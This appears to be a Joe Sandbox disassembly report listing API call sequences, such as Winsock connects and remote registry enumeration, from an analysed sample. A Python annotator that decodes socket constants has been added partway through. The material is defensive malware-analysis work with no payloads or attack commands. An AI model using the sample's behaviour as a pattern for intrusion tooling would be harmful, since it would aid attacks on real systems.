                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: fd5fe6d5916f7784ed04600f1ae5b72eb3cb9f6b4d21234a5e68638c02c53b07
                                                      • Instruction ID: 7ecf7415243fd9311e6887dc6c35cdc5ff14a66545c071fd6fc0cf4df2f1d529
                                                      • Opcode Fuzzy Hash: fd5fe6d5916f7784ed04600f1ae5b72eb3cb9f6b4d21234a5e68638c02c53b07
                                                      • Instruction Fuzzy Hash: 95214F76604219AF9B11DFB8DC88CBB77FCEB0D360B548165FA18DB250D770AD858760
                                                      APIs
                                                        • Part of subcall function 00198475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001984A0
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001968B1
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 001968C0
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001968F9
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00196902
                                                      • WSAGetLastError.WSOCK32 ref: 0019690C
                                                      • closesocket.WSOCK32(00000000), ref: 00196935
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0019694E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 910771015-0
                                                      • Opcode ID: 9ae34a7efa8a915ae46af1380eed7e6dd437aded9661acf200d20aba3b40883d
                                                      • Instruction ID: c92573d32d8e0c76fbd5fc79008800f0c3f97ba9337adc27179a16281bec3661
                                                      • Opcode Fuzzy Hash: 9ae34a7efa8a915ae46af1380eed7e6dd437aded9661acf200d20aba3b40883d
                                                      • Instruction Fuzzy Hash: D531E471600218AFDF10AF64DC85FBE7BADEB58724F044129FD05AB290DB70AD448BA1
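The socket-function entry above lists its arguments only as raw hex, which hides the one thing an analyst wants from it: `socket(2,1,6)` is an IPv4 TCP socket, `8004667E` is `FIONBIO`, and the `ioctlsocket`, `connect`, `WSAGetLastError` order is the connect-with-timeout idiom (connect on a non-blocking socket returns `WSAEWOULDBLOCK` and the caller waits with `select`). The annotator below is an added example, not code from the Joe Sandbox report or from the sample; it parses lines in the report's `API.MODULE(args), ref: addr` format, labels the Winsock constants and flags that sequence. The sample lines are copied from the entry above; the decoder tables, regular expression and function names are my own assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# One Joe Sandbox disassembly API line, in the three shapes seen in the report:
#   • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001968B1
#   • WSAGetLastError.WSOCK32 ref: 0019690C
#   • Part of subcall function 00198475: inet_addr.WSOCK32(00000000,?), ref: 001984A0
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Decoder tables (values assumed from the Windows SDK headers winsock2.h / ws2def.h).
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
IOCTL = {0x8004667E: "FIONBIO", 0x4004667F: "FIONREAD", 0x40047307: "SIOCATMARK"}
# (API name, zero-based argument index) -> table used to label that argument
DECODERS: Dict[Tuple[str, int], Dict[int, str]] = {
    ("socket", 0): AF, ("socket", 1): SOCK_TYPE, ("socket", 2): PROTO,
    ("ioctlsocket", 1): IOCTL,
}


def parse_arg(token: str) -> Optional[int]:
    """'?' means the sandbox could not recover the value; keep it as None."""
    token = token.strip()
    if token in ("", "?"):
        return None
    return int(token, 16)  # also accepts '-00000001' as used for RegEnumValueW


def annotate(line: str) -> Optional[dict]:
    """Parse one API line into a record; None for headers and other non-API lines."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] is not None else []
    api = m["api"]
    notes = [DECODERS[(api, i)][v] for i, v in enumerate(args)
             if (api, i) in DECODERS and v is not None and v in DECODERS[(api, i)]]
    return {"api": api, "module": m["module"], "args": args,
            "ref": int(m["ref"], 16), "sub": m["sub"], "notes": notes}


def find_nonblocking_connect(records: List[dict]) -> Optional[Tuple[int, int, int]]:
    """Return the refs of (ioctlsocket FIONBIO, connect, WSAGetLastError) when they occur
    in that order. Caveat: the third ioctlsocket argument is a pointer to the mode flag,
    so the trace cannot show whether non-blocking mode was switched on or off there."""
    fionbio = connect = None
    for r in records:
        if r["api"] == "ioctlsocket" and "FIONBIO" in r["notes"] and connect is None:
            fionbio = r["ref"]
        elif r["api"] == "connect" and fionbio is not None and connect is None:
            connect = r["ref"]
        elif r["api"] == "WSAGetLastError" and connect is not None:
            return (fionbio, connect, r["ref"])
    return None


def summarize(lines: List[str]) -> List[str]:
    """Human-readable findings for one function's API list."""
    records = [r for r in map(annotate, lines) if r]
    findings = []
    for r in records:
        if r["api"] == "socket" and r["notes"][:3] == ["AF_INET", "SOCK_STREAM", "IPPROTO_TCP"]:
            findings.append(f"{r['ref']:08X}: TCP/IPv4 socket created")
        if r["api"] == "inet_addr":
            findings.append(f"{r['ref']:08X}: inet_addr converts a dotted-decimal string, "
                            "so this path performs no name resolution")
    hit = find_nonblocking_connect(records)
    if hit:
        findings.append("%08X/%08X/%08X: FIONBIO, connect, WSAGetLastError "
                        "(non-blocking connect idiom)" % hit)
    return findings


# Lines copied from the socket-function entry of this report.
SAMPLE_LINES = [
    "  • Part of subcall function 00198475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001984A0",
    "• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001968B1",
    "• WSAGetLastError.WSOCK32(00000000), ref: 001968C0",
    "• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001968F9",
    "• connect.WSOCK32(00000000,?,00000010), ref: 00196902",
    "• WSAGetLastError.WSOCK32 ref: 0019690C",
    "• closesocket.WSOCK32(00000000), ref: 00196935",
    "• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0019694E",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        rec = annotate(line)
        print(f"{rec['ref']:08X} {rec['api']:16s} {rec['notes']}")
    for finding in summarize(SAMPLE_LINES):
        print(finding)
```

The second `ioctlsocket(FIONBIO)` after `closesocket` is consistent with restoring blocking mode on the failure path, but the trace alone does not prove it; confirm against the disassembly at `0019694E` before writing that into a report.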
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0017E3A5
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0017E3CB
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0017E3CE
                                                      • SysAllocString.OLEAUT32 ref: 0017E3EF
                                                      • SysFreeString.OLEAUT32 ref: 0017E3F8
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0017E412
                                                      • SysAllocString.OLEAUT32(?), ref: 0017E420
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 75b8a2668339fcf1b482f221cde47a4d0f3b5cfee32f1c80827065ee2fd7ff83
                                                      • Instruction ID: ddbd2d8cff4c88edd748933a7c70d9edb0dd5afc523234c41d71e62f8c80621b
                                                      • Opcode Fuzzy Hash: 75b8a2668339fcf1b482f221cde47a4d0f3b5cfee32f1c80827065ee2fd7ff83
                                                      • Instruction Fuzzy Hash: AA214435604204AFAB119FA8DC88DAF77ECEB0D360B018665FA19CB260D770EC818B64
                                                      APIs
                                                        • Part of subcall function 00122111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0012214F
                                                        • Part of subcall function 00122111: GetStockObject.GDI32(00000011), ref: 00122163
                                                        • Part of subcall function 00122111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0012216D
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001A7C57
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001A7C64
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001A7C6F
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001A7C7E
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001A7C8A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: b7597690b442e32ee89d41fb11247a95bb851eb464e4ff4670fc7744d1fd9c81
                                                      • Instruction ID: beb1e2e7727505121c237ebce2f1392f4fc671a6d19291f3c86bbbfeef0eb96f
                                                      • Opcode Fuzzy Hash: b7597690b442e32ee89d41fb11247a95bb851eb464e4ff4670fc7744d1fd9c81
                                                      • Instruction Fuzzy Hash: 3711B6B615021ABEEF158F60CC85EEB7F5DEF09768F014115BB04A6090C7719C21DBA0
                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 00149D16
                                                        • Part of subcall function 001433B7: EncodePointer.KERNEL32(00000000), ref: 001433BA
                                                        • Part of subcall function 001433B7: __initp_misc_winsig.LIBCMT ref: 001433D5
                                                        • Part of subcall function 001433B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0014A0D0
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0014A0E4
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0014A0F7
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0014A10A
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0014A11D
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0014A130
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0014A143
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0014A156
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0014A169
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0014A17C
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0014A18F
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0014A1A2
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0014A1B5
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0014A1C8
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0014A1DB
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0014A1EE
                                                      • __mtinitlocks.LIBCMT ref: 00149D1B
                                                      • __mtterm.LIBCMT ref: 00149D24
                                                        • Part of subcall function 00149D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00149D29,00147EFD,001DCD38,00000014), ref: 00149E86
                                                        • Part of subcall function 00149D8C: _free.LIBCMT ref: 00149E8D
                                                        • Part of subcall function 00149D8C: DeleteCriticalSection.KERNEL32(001E0C00,?,?,00149D29,00147EFD,001DCD38,00000014), ref: 00149EAF
                                                      • __calloc_crt.LIBCMT ref: 00149D49
                                                      • __initptd.LIBCMT ref: 00149D6B
                                                      • GetCurrentThreadId.KERNEL32 ref: 00149D72
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                      • String ID:
                                                      • API String ID: 3567560977-0
                                                      • Opcode ID: aa0442e1d949b6e39b1810218d7f3993b819b6a91075afa81754f2a8405f6873
                                                      • Instruction ID: e0c7870ffc3ed990d6236c8ef60eccb3eeda3e0810367d27294b10d9d167c7d3
                                                      • Opcode Fuzzy Hash: aa0442e1d949b6e39b1810218d7f3993b819b6a91075afa81754f2a8405f6873
                                                      • Instruction Fuzzy Hash: D1F090329497115AE739BBF47C4364B2AD4DF51730F200759F468DA0F3EF50C9814190
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00144282,?), ref: 001441D3
                                                      • GetProcAddress.KERNEL32(00000000), ref: 001441DA
                                                      • EncodePointer.KERNEL32(00000000), ref: 001441E6
                                                      • DecodePointer.KERNEL32(00000001,00144282,?), ref: 00144203
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoInitialize$combase.dll
                                                      • API String ID: 3489934621-340411864
                                                      • Opcode ID: 5d48e4b8de2af29c4bc910bae3963e178f8fe71450002e7ced53f3508fa94f6e
                                                      • Instruction ID: ef118156f503f766582abf0649c5438c328319944da570c3cff612620df4f43e
                                                      • Opcode Fuzzy Hash: 5d48e4b8de2af29c4bc910bae3963e178f8fe71450002e7ced53f3508fa94f6e
                                                      • Instruction Fuzzy Hash: C1E01A70690741AFDB512FB0EC8DB4936A6B758B0BF604924F511D98B0DBB554C58F00
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001441A8), ref: 001442A8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 001442AF
                                                      • EncodePointer.KERNEL32(00000000), ref: 001442BA
                                                      • DecodePointer.KERNEL32(001441A8), ref: 001442D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 3489934621-2819208100
                                                      • Opcode ID: 4f0cab6b0e34b6b98a80fe8e8181f2a00d7a81113be38bf98944a1b11dbdadf3
                                                      • Instruction ID: a403672efe430087b4fde15a9a0d54f0d0071c43e7d6242f888b63b63fcaba75
                                                      • Opcode Fuzzy Hash: 4f0cab6b0e34b6b98a80fe8e8181f2a00d7a81113be38bf98944a1b11dbdadf3
                                                      • Instruction Fuzzy Hash: 68E0B670650740AFDB529FA0ED8DB4A3AA5B708B0AF900618F011D99B0CBB485D4DA10
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 001221B8
                                                      • GetWindowRect.USER32(?,?), ref: 001221F9
                                                      • ScreenToClient.USER32(?,?), ref: 00122221
                                                      • GetClientRect.USER32(?,?), ref: 00122350
                                                      • GetWindowRect.USER32(?,?), ref: 00122369
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Rect$Client$Window$Screen
                                                      • String ID:
                                                      • API String ID: 1296646539-0
                                                      • Opcode ID: 45ac7d4b05f150dbf5813a7f4e252bfde5d2ac916db95ad5c4d495933c470820
                                                      • Instruction ID: b081266c3a6a8e1e71710111b37a93f903bedebc08837b4ff34c1ccf80f1fbe6
                                                      • Opcode Fuzzy Hash: 45ac7d4b05f150dbf5813a7f4e252bfde5d2ac916db95ad5c4d495933c470820
                                                      • Instruction Fuzzy Hash: 35B17039900249EBDF14CFA8C5807EEB7B1FF08710F148169ED69EB254DB35AA60DB64
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memmove$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 3253778849-0
                                                      • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                      • Instruction ID: 2186326155f1a0005fab314c3996bc8578aff0bb28f55fd9058a7e5cf11dcac3
                                                      • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                      • Instruction Fuzzy Hash: 8461CE3050069AABCF15FFA4CC82EFE3BA9AF25308F044559F8596B1A2DB349E55CB50
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 001A147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001A040D,?,?), ref: 001A1491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001A091D
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001A095D
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 001A0980
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001A09A9
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001A09EC
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 001A09F9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                      • String ID:
                                                      • API String ID: 4046560759-0
                                                      • Opcode ID: d1c0aa812308217aaa39527c0c0e0e6991ed7588e11ea985749f18d801e8127b
                                                      • Instruction ID: 5d79f97b0a577473449ffa2a8c6cd0a9f7741f015a92a710062d58898afc082f
                                                      • Opcode Fuzzy Hash: d1c0aa812308217aaa39527c0c0e0e6991ed7588e11ea985749f18d801e8127b
                                                      • Instruction Fuzzy Hash: 51516631208204AFD715EF64C885E6FBBE9FF99314F044A1DF589872A2DB31E945CB92
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0017F6A2
                                                      • VariantClear.OLEAUT32(00000013), ref: 0017F714
                                                      • VariantClear.OLEAUT32(00000000), ref: 0017F76F
                                                      • _memmove.LIBCMT ref: 0017F799
                                                      • VariantClear.OLEAUT32(?), ref: 0017F7E6
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0017F814
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                      • String ID:
                                                      • API String ID: 1101466143-0
                                                      • Opcode ID: 0590f1d8cd743501f89072ca8da662663e1bcd588126ed7cabf2d08ea0eb4fa9
                                                      • Instruction ID: dd0ab446fcce476c358acdc8935f753b59bf9771636f30f918771c304dd0aab6
                                                      • Opcode Fuzzy Hash: 0590f1d8cd743501f89072ca8da662663e1bcd588126ed7cabf2d08ea0eb4fa9
                                                      • Instruction Fuzzy Hash: 7A5139B5A00209EFDB14CF58C884AAAB7B8FF4C354B15856EE959DB304D731E952CFA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 001829FF
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00182A4A
                                                      • IsMenu.USER32(00000000), ref: 00182A6A
                                                      • CreatePopupMenu.USER32 ref: 00182A9E
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00182AFC
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00182B2D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: 8876b68976837fb7d880918ccb3687005e3debbf2b65d854260a0c322632f06f
                                                      • Instruction ID: 6282d94b0be3714c714bfc57e99db59de8e5ac05d1f04d921fcb3eecbaab716d
                                                      • Opcode Fuzzy Hash: 8876b68976837fb7d880918ccb3687005e3debbf2b65d854260a0c322632f06f
                                                      • Instruction Fuzzy Hash: F251BD70601249DFCF2AEF68D8C8AAEBBF5EF15314F104259E8119B2A1D7709A44CF51
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00121B76
                                                      • GetWindowRect.USER32(?,?), ref: 00121BDA
                                                      • ScreenToClient.USER32(?,?), ref: 00121BF7
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00121C08
                                                      • EndPaint.USER32(?,?), ref: 00121C52
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
